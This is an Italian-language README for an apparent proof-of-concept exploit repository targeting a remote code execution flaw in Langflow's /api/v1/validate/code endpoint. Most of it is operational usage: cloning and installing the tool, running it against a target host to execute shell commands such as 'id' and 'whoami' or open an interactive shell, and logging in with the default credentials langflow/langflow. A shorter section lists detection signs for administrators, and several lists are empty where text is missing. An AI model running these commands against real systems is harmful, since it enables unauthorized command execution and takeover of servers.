
Langflow Remote Code Execution (RCE) Proof-of-Concept
Vulnerabilità di Remote Code Execution in Langflow
Questa vulnerabilità interessa:
Langflow
CVE-2026-0770 è una vulnerabilità di Remote Code Execution (RCE) nell'endpoint:
/api/v1/validate/code
Quando AUTO_LOGIN=true e le credenziali predefinite sono abilitate, gli attaccanti possono:
Il problema deriva da una valutazione non sicura del codice Python durante la validazione.
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
Assicurarsi che Python 3.8+ sia installato.
Installare le dipendenze:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
Avviare l'esecuzione remota interattiva dei comandi:
python3 CVE-2026-0770.py -t http://target:7860
Esempio:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
Esempio:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
Mostra output di debug dettagliato.
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
Se non viene fornito alcun token, lo script tenta l'auto-login utilizzando:
username: langflow
password: langflow
In caso di successo, recupera un access_token e prosegue.
Gli amministratori dovrebbero:
AUTO_LOGIN/api/v1/validate/codeMonitorare per:
Richieste POST sospette a /api/v1/validate/code
Codice contenente:
__import__subprocessthrow(Exception(Tentativi di login ripetuti con credenziali predefinite
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
Ricercatore di Sicurezza | Sviluppatore di Exploit | Scrittore di PoC
Distribuito sotto la Licenza MIT. Vedi la licenza completa qui:
Questo progetto è destinato a:
L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per cui non si ha esplicito permesso di testare è illegale.